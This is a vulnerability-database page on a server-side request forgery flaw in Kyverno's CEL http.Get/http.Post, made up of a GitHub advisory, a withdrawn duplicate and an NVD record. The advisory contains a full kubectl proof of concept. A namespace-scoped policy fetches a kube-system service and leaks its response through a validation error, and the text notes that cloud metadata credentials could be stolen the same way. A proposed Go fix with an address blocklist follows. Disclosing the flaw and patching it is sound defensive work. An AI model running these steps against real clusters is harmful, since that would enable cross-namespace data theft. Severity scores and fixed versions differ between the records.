error: failed to create configmap: admission webhook "nvpol.validate.kyverno.svc-fail"
denied the request: Policy cel-ssrf-poc failed:
SSRF_LEAKED: secret=STOLEN_INTERNAL_SECRET_12345 token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9
Impact
- Cross-namespace data access: Users with only namespace-scoped permissions can access services in any namespace
- Cloud credential theft: Access to `http://169.254.169.254/...` allows stealing AWS/GCP/Azure IAM credentials
- Data exfiltration: HTTP response data exposed via validation error messages or audit annotations
- Breaks namespace isolation: Inconsistent with Kyverno's security model where `resource.Lib` enforces namespace boundaries
Affected Policies
All CEL-based namespaced policies in policies.kyverno.io API group:
- NamespacedValidatingPolicy
- NamespacedMutatingPolicy
- NamespacedDeletingPolicy
- NamespacedImageValidatingPolicy
Suggested Fix
Add namespace and URL restrictions to pkg/cel/libs/http/http.go, similar to how resource.Lib enforces namespace boundaries. A check on the URL string alone is not sufficient: a permitted hostname can resolve to a blocked address (DNS rebinding), and a permitted host can redirect into a blocked range, so the same blocklist must also be applied to the resolved address at dial time, and the same-namespace rule should match the service DNS name structurally rather than by substring:
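// imports needed by this excerpt: context, fmt, net, net/url, strings
// (plus the version/cel packages the surrounding file already uses).

// lib carries the policy's namespace into the http library, mirroring what
// resource.Lib already does, so namespaced policies can be scoped.
type lib struct {
	namespace string // Add namespace parameter
	version   *version.Version
}

// Get is the CEL http.Get() entry point. Anyone who can create a policy
// controls url, so it is validated before a request is built. Assumes
// contextImpl is built from lib and carries its namespace — TODO confirm.
func (r *contextImpl) Get(url string, headers map[string]string) (any, error) {
	if err := r.validateURL(url); err != nil {
		return nil, fmt.Errorf("blocked URL: %w", err)
	}
	// ... existing code. The request must be sent through an http.Client whose
	// Transport.DialContext is wrapped by blockedDialContext; without that, the
	// string check above is defeated by a hostname that resolves to a blocked
	// address, or by a redirect from a permitted host into a blocked range.
}

// validateURL is a string-level pre-filter: scheme, literal-IP blocklist and,
// for namespaced policies, a same-namespace service-name requirement. It is
// deliberately not the only control — see blockedDialContext.
func (r *contextImpl) validateURL(urlStr string) error {
	u, err := url.Parse(urlStr)
	if err != nil {
		return err
	}
	// Only http/https; refuse anything else (file:, gopher:, ...) up front.
	if u.Scheme != "http" && u.Scheme != "https" {
		return fmt.Errorf("scheme %q not allowed", u.Scheme)
	}
	host := u.Hostname() // strips the port and IPv6 brackets
	if host == "" {
		return fmt.Errorf("missing host")
	}
	// Literal addresses are checked here. net.ParseIP normalises IPv4-mapped
	// IPv6 (::ffff:169.254.169.254) to the same 16-byte form, so isBlockedIP
	// sees through that encoding. Other spellings the resolver may accept are
	// caught at dial time instead.
	ip := net.ParseIP(host)
	if ip != nil && isBlockedIP(ip) {
		return fmt.Errorf("address %s is not reachable from policies", ip)
	}
	if r.namespace != "" {
		// For namespaced policies: restrict to same-namespace services only.
		// A literal IP, a bare "<svc>" (which resolves in the controller's own
		// namespace) or an external name is refused.
		if ip != nil || !isSameNamespaceService(host, r.namespace) {
			return fmt.Errorf("host %q is outside namespace %q", host, r.namespace)
		}
	}
	return nil
}

// isSameNamespaceService reports whether host is the cluster-DNS name of a
// Service in ns: "<svc>.<ns>.svc" optionally followed by the cluster domain.
// The domain defaults to "cluster.local" but is cluster-configurable, so only
// the first three labels are inspected.
func isSameNamespaceService(host, ns string) bool {
	labels := strings.Split(strings.TrimSuffix(host, "."), ".")
	return len(labels) >= 3 && labels[0] != "" && labels[1] == ns && labels[2] == "svc"
}

// isBlockedIP is the single definition of "never reach this address". It is
// applied both to literal IPs in the URL and to resolved addresses at dial
// time, and covers the IPv6 forms of the ranges the advisory names, not only
// 169.254.0.0/16 and 127.0.0.0/8. Provider-specific IPv6 metadata endpoints
// (e.g. AWS IMDS at fd00:ec2::254) are unique-local rather than link-local and
// need an explicit entry here — check the provider's documentation.
func isBlockedIP(ip net.IP) bool {
	return ip.IsLoopback() || // 127.0.0.0/8, ::1
		ip.IsUnspecified() || // 0.0.0.0, :: (dials the local host on most stacks)
		ip.IsLinkLocalUnicast() || // 169.254.0.0/16 (cloud metadata), fe80::/10
		ip.IsLinkLocalMulticast()
}

// blockedDialContext wraps an http.Transport's DialContext so that isBlockedIP
// is applied to the address actually connected to, after DNS resolution. This
// is the control that defeats DNS rebinding (a permitted hostname answering
// with 169.254.169.254) and, because redirected requests reuse the same
// transport, redirects from a permitted host into a blocked range. TLS is
// still negotiated by the Transport against the original host name, so
// dialing by IP does not affect certificate verification.
func blockedDialContext(next func(ctx context.Context, network, addr string) (net.Conn, error)) func(ctx context.Context, network, addr string) (net.Conn, error) {
	return func(ctx context.Context, network, addr string) (net.Conn, error) {
		host, port, err := net.SplitHostPort(addr)
		if err != nil {
			return nil, err
		}
		ips, err := net.DefaultResolver.LookupIPAddr(ctx, host)
		if err != nil {
			return nil, err
		}
		if len(ips) == 0 {
			return nil, fmt.Errorf("blocked URL: %s does not resolve", host)
		}
		for _, ip := range ips {
			if isBlockedIP(ip.IP) {
				return nil, fmt.Errorf("blocked URL: %s resolves to %s", host, ip.IP)
			}
		}
		// Dial the address that was checked, not the name, so a second lookup
		// cannot return a different answer.
		return next(ctx, network, net.JoinHostPort(ips[0].IP.String(), port))
	}
}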
Attached kyverno-cel-ssrf-poc.sh
Credit
Discovered by: Igor Stepansky
Organization: Orca Security
Email: igor.stepansky@orca.security
Personal Email: stepanskyigor@gmail.com
{
"affected": [
{
"package": {
"ecosystem": "Go",
"name": "github.com/kyverno/kyverno"
},
"ranges": [
{
"events": [
{
"introduced": "1.16.0"
},
{
"fixed": "1.17.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-4789"
],
"database_specific": {
"cwe_ids": [
"CWE-918"
],
"github_reviewed": true,
"github_reviewed_at": "2026-04-14T22:37:20Z",
"nvd_published_at": null,
"severity": "HIGH"
},
"details": "## Summary\n\nA Server-Side Request Forgery (SSRF) vulnerability in Kyverno\u0027s CEL HTTP library (`pkg/cel/libs/http/`) allows users with namespace-scoped policy creation permissions to make arbitrary HTTP requests from the Kyverno admission controller. This enables unauthorized access to internal services in other namespaces, cloud metadata endpoints (169.254.169.254), and data exfiltration via policy error messages.\n\n## Affected Versions\n\n- Kyverno \u003e= 1.16.0 (with `policies.kyverno.io` CRDs enabled, which is the default)\n- Tested on: Kyverno v1.16.2 (Helm chart 3.6.2)\n\n## Details\n\nThe `http.Get()` and `http.Post()` functions available in CEL-based policies (`policies.kyverno.io` API group) do not enforce any URL restrictions. Unlike `resource.Lib` which enforces namespace boundaries for namespaced policies, the `http.Lib` allows unrestricted access to any URL.\n\n**Vulnerable Code:** `pkg/cel/libs/http/http.go`\n```go\nfunc (r *contextImpl) Get(url string, headers map[string]string) (any, error) {\n req, err := http.NewRequestWithContext(context.TODO(), \"GET\", url, nil)\n // NO URL VALIDATION - no blocklist, no namespace restrictions\n ...\n}\n```\n\n**Contrast with resource.Lib** which enforces namespace:\n```go\n// pkg/cel/libs/resource/lib.go\nfunc Lib(namespace string, v *version.Version) cel.EnvOption {\n return cel.Lib(\u0026lib{namespace: namespace, version: v}) // Namespace enforced\n}\n```\n\nThis is a **different code path** from previously reported issues:\n- GHSA-8p9x-46gm-qfx2: `pkg/engine/apicall/apiCall.go` (URLPath) - Fixed\n- GHSA-459x-q9hg-4gpq: `pkg/engine/apicall/executor.go` (Service.URL) - Different feature (apiCall vs CEL http)\n- **This issue**: `pkg/cel/libs/http/http.go` (CEL http.Get/http.Post) - **Not fixed**\n\n## PoC\n\nTested on Kyverno v1.16.2 (Chart 3.6.2) on Kubernetes v1.35.0 (kind).\n\nA complete automated PoC script is attached. Manual steps below:\n\n### 1. 
Setup attacker with namespace-scoped permissions\n```bash\nkubectl create namespace attacker-ns\nkubectl create serviceaccount namespace-admin -n attacker-ns\n\ncat \u003c\u003cEOF | kubectl apply -f -\napiVersion: rbac.authorization.k8s.io/v1\nkind: Role\nmetadata:\n name: namespace-admin-role\n namespace: attacker-ns\nrules:\n - apiGroups: [\"\"]\n resources: [\"configmaps\"]\n verbs: [\"create\", \"get\", \"list\"]\n - apiGroups: [\"policies.kyverno.io\"]\n resources: [\"namespacedvalidatingpolicies\"]\n verbs: [\"create\", \"get\", \"list\"]\n---\napiVersion: rbac.authorization.k8s.io/v1\nkind: RoleBinding\nmetadata:\n name: namespace-admin-binding\n namespace: attacker-ns\nsubjects:\n - kind: ServiceAccount\n name: namespace-admin\n namespace: attacker-ns\nroleRef:\n kind: Role\n name: namespace-admin-role\n apiGroup: rbac.authorization.k8s.io\nEOF\n```\n\n### 2. Create sensitive internal service (simulating internal API or cloud metadata)\n```bash\ncat \u003c\u003cEOF | kubectl apply -f -\napiVersion: v1\nkind: Pod\nmetadata:\n name: internal-api\n namespace: kube-system\n labels:\n app: internal-api\nspec:\n containers:\n - name: server\n image: hashicorp/http-echo\n args:\n - \"-text={\\\"secret\\\": \\\"STOLEN_INTERNAL_SECRET_12345\\\", \\\"token\\\": \\\"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9\\\"}\"\n - \"-listen=:8080\"\n---\napiVersion: v1\nkind: Service\nmetadata:\n name: internal-api\n namespace: kube-system\nspec:\n selector:\n app: internal-api\n ports:\n - port: 80\n targetPort: 8080\nEOF\n```\n\n### 3. Verify attacker cannot access kube-system directly\n```bash\nkubectl auth can-i get pods -n kube-system --as=system:serviceaccount:attacker-ns:namespace-admin\n# Output: no\n```\n\n### 4. 
Create malicious NamespacedValidatingPolicy (as attacker)\n```bash\ncat \u003c\u003cEOF | kubectl apply --as=system:serviceaccount:attacker-ns:namespace-admin -f -\napiVersion: policies.kyverno.io/v1beta1\nkind: NamespacedValidatingPolicy\nmetadata:\n name: cel-ssrf-poc\n namespace: attacker-ns\nspec:\n matchConstraints:\n resourceRules:\n - apiGroups: [\"\"]\n apiVersions: [\"v1\"]\n operations: [\"CREATE\"]\n resources: [\"configmaps\"]\n variables:\n - name: stolenData\n expression: |\n http.Get(\u0027http://internal-api.kube-system.svc.cluster.local\u0027)\n validations:\n - expression: \"false\"\n message: \"Validation failed\"\n messageExpression: |\n \u0027SSRF_LEAKED: secret=\u0027 + variables.stolenData[\u0027secret\u0027] + \u0027 token=\u0027 + variables.stolenData[\u0027token\u0027]\nEOF\n```\n\n### 5. Trigger exploit and exfiltrate data\n```bash\nkubectl create configmap trigger --from-literal=x=y -n attacker-ns \\\n --as=system:serviceaccount:attacker-ns:namespace-admin\n```\n\n### 6. Result - Secret data exfiltrated\n```\nerror: failed to create configmap: admission webhook \"nvpol.validate.kyverno.svc-fail\" \ndenied the request: Policy cel-ssrf-poc failed: \nSSRF_LEAKED: secret=STOLEN_INTERNAL_SECRET_12345 token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9\n```\n\n## Impact\n\n1. **Cross-namespace data access**: Users with only namespace-scoped permissions can access services in any namespace\n2. **Cloud credential theft**: Access to `http://169.254.169.254/...` allows stealing AWS/GCP/Azure IAM credentials\n3. **Data exfiltration**: HTTP response data exposed via validation error messages or audit annotations\n4. 
**Breaks namespace isolation**: Inconsistent with Kyverno\u0027s security model where `resource.Lib` enforces namespace boundaries\n\n## Affected Policies\n\nAll CEL-based namespaced policies in `policies.kyverno.io` API group:\n- `NamespacedValidatingPolicy`\n- `NamespacedMutatingPolicy` \n- `NamespacedDeletingPolicy`\n- `NamespacedImageValidatingPolicy`\n\n## Suggested Fix\n\nAdd namespace and URL restrictions to `pkg/cel/libs/http/http.go`, similar to how `resource.Lib` enforces namespace boundaries:\n```go\ntype lib struct {\n namespace string // Add namespace parameter\n version *version.Version\n}\n\nfunc (r *contextImpl) Get(url string, headers map[string]string) (any, error) {\n if err := r.validateURL(url); err != nil {\n return nil, fmt.Errorf(\"blocked URL: %w\", err)\n }\n // ... existing code\n}\n\nfunc (r *contextImpl) validateURL(urlStr string) error {\n // Block cloud metadata (169.254.0.0/16)\n // Block localhost/loopback (127.0.0.0/8)\n // For namespaced policies: restrict to same namespace services only\n}\n```\n\nAttached \n[kyverno-cel-ssrf-poc.sh](https://github.com/user-attachments/files/24940825/kyverno-cel-ssrf-poc.sh)\n\n\n## Credit\n\nDiscovered by: Igor Stepansky\nOrganization: Orca Security\nEmail: igor.stepansky@orca.security\nPersonal Email: stepanskyigor@gmail.com",
"id": "GHSA-rggm-jjmc-3394",
"modified": "2026-04-14T22:37:20Z",
"published": "2026-04-14T22:37:20Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/kyverno/kyverno/security/advisories/GHSA-rggm-jjmc-3394"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-4789"
},
{
"type": "WEB",
"url": "https://github.com/kyverno/kyverno/pull/15729"
},
{
"type": "PACKAGE",
"url": "https://github.com/kyverno/kyverno"
},
{
"type": "WEB",
"url": "https://www.kb.cert.org/vuls/id/655822"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N",
"type": "CVSS_V3"
}
],
"summary": "Kyverno has SSRF via CEL http.Get/http.Post in NamespacedValidatingPolicy allows cross-namespace data access"
}
GHSA-QQRV-2HCH-83Q4
Vulnerability from github – Published: 2026-03-30 21:31 – Updated: 2026-04-14 22:36
Duplicate Advisory
This advisory has been withdrawn because it is a duplicate of GHSA-rggm-jjmc-3394. This link is maintained to preserve external references.
Original Description
Kyverno, versions 1.16.0 and later, are vulnerable to SSRF due to unrestricted CEL HTTP functions.
{
"affected": [
{
"package": {
"ecosystem": "Go",
"name": "github.com/kyverno/kyverno"
},
"ranges": [
{
"events": [
{
"introduced": "1.16.0"
},
{
"last_affected": "1.17.1"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [],
"database_specific": {
"cwe_ids": [
"CWE-918"
],
"github_reviewed": true,
"github_reviewed_at": "2026-04-01T23:07:50Z",
"nvd_published_at": "2026-03-30T21:17:10Z",
"severity": "MODERATE"
},
"details": "## Duplicate Advisory\n\nThis advisory has been withdrawn because it is a duplicate of GHSA-rggm-jjmc-3394. This link is maintained to preserve external references.\n\n## Original Description\nKyverno, versions 1.16.0 and later, are vulnerable to SSRF due to unrestricted CEL HTTP functions.",
"id": "GHSA-qqrv-2hch-83q4",
"modified": "2026-04-14T22:36:54Z",
"published": "2026-03-30T21:31:05Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-4789"
},
{
"type": "WEB",
"url": "https://github.com/kyverno/kyverno/pull/15729"
},
{
"type": "PACKAGE",
"url": "https://github.com/kyverno/kyverno"
},
{
"type": "WEB",
"url": "https://kb.cert.org/vuls/id/655822"
},
{
"type": "WEB",
"url": "https://portswigger.net/web-security/ssrf"
},
{
"type": "WEB",
"url": "https://www.kb.cert.org/vuls/id/655822"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N",
"type": "CVSS_V4"
}
],
"summary": "Duplicate Advisory: Kyverno is vulnerable to server-side request forgery (SSRF)",
"withdrawn": "2026-04-14T22:36:54Z"
}
FKIE_CVE-2026-4789
Vulnerability from fkie_nvd - Published: 2026-03-30 21:17 - Updated: 2026-04-03 18:17
| Source | URL | Tags | |
|---|---|---|---|
| cret@cert.org | https://github.com/kyverno/kyverno | Product | |
| cret@cert.org | https://kb.cert.org/vuls/id/655822 | Third Party Advisory | |
| cret@cert.org | https://portswigger.net/web-security/ssrf | Technical Description | |
| af854a3a-2127-422b-91ae-364da2661108 | https://www.kb.cert.org/vuls/id/655822 | Third Party Advisory |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:kyverno:kyverno:*:*:*:*:*:*:*:*",
"matchCriteriaId": "F2E0715F-61DE-45F5-840E-06CF5C468D33",
"versionEndIncluding": "1.17.1",
"versionStartIncluding": "1.16.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Kyverno, versions 1.16.0 and later, are vulnerable to SSRF due to unrestricted CEL HTTP functions."
},
{
"lang": "es",
"value": "Kyverno, versiones 1.16.0 y posteriores, son vulnerables a SSRF debido a funciones HTTP CEL sin restricciones."
}
],
"id": "CVE-2026-4789",
"lastModified": "2026-04-03T18:17:51.837",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"type": "Secondary"
}
]
},
"published": "2026-03-30T21:17:10.843",
"references": [
{
"source": "cret@cert.org",
"tags": [
"Product"
],
"url": "https://github.com/kyverno/kyverno"
},
{
"source": "cret@cert.org",
"tags": [
"Third Party Advisory"
],
"url": "https://kb.cert.org/vuls/id/655822"
},
{
"source": "cret@cert.org",
"tags": [
"Technical Description"
],
"url": "https://portswigger.net/web-security/ssrf"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://www.kb.cert.org/vuls/id/655822"
}
],
"sourceIdentifier": "cret@cert.org",
"vulnStatus": "Analyzed",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-918"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Sightings
| Author | Source | Type | Date | Other |
|---|---|---|---|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.